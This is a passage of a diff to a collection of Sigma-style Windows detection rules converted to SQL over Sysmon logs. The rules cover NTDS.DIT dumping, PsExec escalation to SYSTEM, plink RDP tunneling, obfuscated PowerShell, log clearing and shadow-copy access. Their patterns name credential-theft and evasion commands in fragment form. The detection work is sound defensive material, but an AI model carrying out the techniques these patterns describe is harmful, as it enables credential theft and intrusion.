PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Suspicious Process Patterns NTDS.DIT Exfil", + "id": "8bc64091-6875-4881-aaf9-7bd25b5dda08", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious process patterns used in NTDS.DIT exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the 
SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * 
FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\NTDSDump.exe' ESCAPE '\\' OR Image LIKE '%\\\\NTDSDumpEx.exe' ESCAPE '\\') OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND CommandLine LIKE '%system.hiv%' ESCAPE '\\') OR CommandLine LIKE '%NTDSgrab.ps1%' ESCAPE '\\') OR (CommandLine LIKE '%ac i ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%/c copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\windows\\\\ntds\\\\ntds.dit%' ESCAPE '\\') OR (CommandLine LIKE '%activate instance ntds%' ESCAPE '\\' AND CommandLine LIKE '%create full%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%ntds.dit%' ESCAPE '\\')) OR (CommandLine LIKE '%ntds.dit%' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\apache%' ESCAPE '\\' OR Image LIKE '%\\\\tomcat%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_susp_ntds.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.t1546.003" - ], + "title": "Suspicious PowerShell Child Processes", + "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "status": "experimental", + "description": "Detects suspicious child 
processes spawned by PowerShell", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_powershell_susp_child_processes.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", 
- "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - SysmonEOP Execution", + "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "status": "experimental", + "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "cve.2022.41120", + "attack.t1068", + "attack.privilege_escalation" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_hktl_sysmoneop.yml" 
}, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", - "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Dtrack RAT Activity", + "id": "f1531fa4-5b84-4342-8f68-9cf3fdbd83d4", + "status": "stable", + "description": "Detects potential Dtrack RAT activity via specific process patterns", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ping -n %' ESCAPE '\\' AND CommandLine LIKE '% echo EEEE > %' ESCAPE '\\') OR (CommandLine LIKE '%ipconfig /all%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\res.ip%' ESCAPE '\\') OR (CommandLine LIKE '%interface ip show config%' ESCAPE '\\' AND CommandLine LIKE '%\\\\temp\\\\netsh.res%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_malware_dtrack.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Copy From VolumeShadowCopy Via Cmd.EXE", + "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate WinRM usage" + "Backup scenarios using the commandline" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_cmd_shadowcopy_access.yml" }, { - "title": "Potential Crypto Mining 
Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Execution AppData Folder", + "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "status": "experimental", + "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", "tags": [ - "attack.impact", - "attack.t1496" + "attack.execution", + "attack.persistence", + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_schtasks_appdata_local_system.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "Suspicious WmiPrvSE Child Process", + "id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. 
Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE 
'%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND LogonId = '0x3e7')) AND NOT (((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentImage LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (Image LIKE 
'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep 
bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine 